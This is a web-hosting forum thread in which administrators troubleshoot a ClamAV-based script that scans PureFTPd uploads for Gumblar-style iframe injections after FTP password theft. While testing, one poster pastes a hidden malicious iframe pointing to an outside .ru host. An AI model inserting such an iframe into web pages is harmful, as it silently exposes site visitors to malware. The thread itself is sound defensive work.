SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

smksa

Member
Aug 1, 2006
21
0
151
Hi,

I notice that the script will scan the overwrited file and move it to quarantine.

Eg : public_html/index.php and if the attack is overwrite the index.php , the existing index.php will be remove and moved to quarantine folder.

Is there anyway, that we can avoid the overwrite and avoid removal of existing index.php file ?

Probably scanning during the upload before the overwrite happened ? :confused:
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
Hi,

I notice that the script will scan the overwrited file and move it to quarantine.

Eg : public_html/index.php and if the attack is overwrite the index.php , the existing index.php will be remove and moved to quarantine folder.

Is there anyway, that we can avoid the overwrite and avoid removal of existing index.php file ?

Probably scanning during the upload before the overwrite happened ? :confused:
I want to scan before overwrite but this is not possible at this time.
I've contacted to author of PureFTPd and asked him. He did not replied me yet.
 

isputra

Well-Known Member
May 3, 2003
574
0
166
Mbelitar
It's not working. After install this script like the manual and restart FTP then i try to upload file with this code in it :

PHP:
<iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>
The file i called if-rame.html still can through the FTP process and reside on server without rejection from this script.

So.. how to get this script working ?
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
I'm going to update my script.

these changes will be applied to script very soon:

1 ) sh files need not be
2 ) user name will be extracted from the file path. This was a bug. Pure FTP not returning username and other arguments.
3 ) i will try to extract clean copy of infected file from backup.
 

smksa

Member
Aug 1, 2006
21
0
151
Have pureftpd author responded to your question regarding scanning while uploading ?

I think this will be better solution.
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
Hello,

I have also installed your script step by step from your site but it is not working. I have restart pure ftp and clam and still not working. The only thing I do not quite get and mybe here is the mistake so script dont work is this part at step 2 "Patch /etc/init.d/pure-ftpd" should I do something coze in step 2 I have only Edit /etc/init.d/pure-ftpd as you instruct but do not know what (if anything) should I do here "Edit /etc/init.d/pure-ftpd ".

I would really appreciate your help since your script by description looks fantastic and would be really god defense agains iframe and some other hacks too.

Best regards, Erik
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
Hello,

I have also installed your script step by step from your site but it is not working. I have restart pure ftp and clam and still not working. The only thing I do not quite get and mybe here is the mistake so script dont work is this part at step 2 "Patch /etc/init.d/pure-ftpd" should I do something coze in step 2 I have only Edit /etc/init.d/pure-ftpd as you instruct but do not know what (if anything) should I do here "Edit /etc/init.d/pure-ftpd ".

I would really appreciate your help since your script by description looks fantastic and would be really god defense agains iframe and some other hacks too.

Best regards, Erik
Possible problems,

1 ) restart pure ftp with /etc/init.d/pure-ftpd restart, script not working with WHM restart

2 ) you can use nano or vi for editing files. e.g. : nano /etc/init.d/pure-ftpd

a new update will coming soon...
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
Thanx but I did all that and it is not working. If I use command pa aux | grep clam I do see that /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh is runing but it does not scan uploaded files. If I kill that proccess and restart pure-ftp proccess starts again but just wunt to scan files.
 

ThE EnD

Member
Aug 25, 2009
15
0
51
i can not get it working

hello ,
first let me thank u soo much for that great work
and hard one

but iam sorry telling u i can't make it work on my server

i follow all the steps
Anti-Gumblar Protection Documentation
all of it

but what i do after that
should i make any thing
open and files or any thing to make the script start

or what

and another thing
when i type

/etc/init.d/pure-ftpd restart


i get that result
[email protected] [~]# /etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog --daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:

can u solve that please and thank you

and should i replace that
GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

with the correct key i get from whm

in ThE EnD iam sorry for my english
waiting ur answer
 

Vinayak

Well-Known Member
Jun 27, 2003
288
6
168
Bharat
cPanel Access Level
Root Administrator
@ ThE EnD
@ webicom

Have you guys made the script executable, check file permissions.

Also note that there are two files one ftp_clamscan.sh that passes variables to ftp_clamscan.php, so both should have correct permissions.

@ webicom
Yes you should
GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

with the correct key i get from whm
 

ThE EnD

Member
Aug 25, 2009
15
0
51
@ ThE EnD
@ webicom

Have you guys made the script executable, check file permissions.

Also note that there are two files one ftp_clamscan.sh that passes variables to ftp_clamscan.php, so both should have correct permissions.

@ webicom
Yes you should
i have gave the two files the chmod 755 , is that ok
and then replace the access key with the right now from the whm for the root

and thin try to make
[email protected] [~]# /etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog --daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:

so what's the error here ?and how to solve that problem

and how to start the script working

please explain
 

Vinayak

Well-Known Member
Jun 27, 2003
288
6
168
Bharat
cPanel Access Level
Root Administrator
Use

chmod +x ftp_clamscan.sh
chmod +x ftp_clamscan.php

At command line, also see if an error_log file is generated in the same folder. If error_log is there check it out, see what message is in there.
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
Thank you vinsar, I forgot to chmod php file and now that I did it is working. But still have strange problem on one server scripts allways find iframe script and block the attacker but does not change password for infected user. On the other server script does not allways find iframe script but do block IP and change pasword. The first server is cetnOS 4.7 other one is 5.2 both are same WHM/Cpanel version. Usualy on server where script does not always find iframe script after it finds infected file I have to kill pid of the ftp_clamscan.sh script and restart pure-ftpd and then it finds script again but after firs find it does not find anymore. Any idea why is that?
 
Last edited:

ThE EnD

Member
Aug 25, 2009
15
0
51
i have make the changes as u reques for the two files

and these files in the root directory

or when should i replace it
and also

iam still finiding the same error when restating ftp

/etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:


please tell me what 's that
as it's from the two line u ask to add in the ftp conf. files
in ur explain

and u do not answer me

after all that how to know if the script is running or not

and thanks
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
i have make the changes as u reques for the two files

and these files in the root directory

or when should i replace it
and also

iam still finiding the same error when restating ftp

/etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:


please tell me what 's that
as it's from the two line u ask to add in the ftp conf. files
in ur explain

and u do not answer me

after all that how to know if the script is running or not

and thanks
run command through ssh ps aux | grep clam and reply here what you get. The best way to test if script is working is that you upload index.html or whatever file with iframe in it and if you have set everything right you should be disconected from server and get email. If you are gona test this way make shore you stil have another locatin with diferent IP from where you can connect again.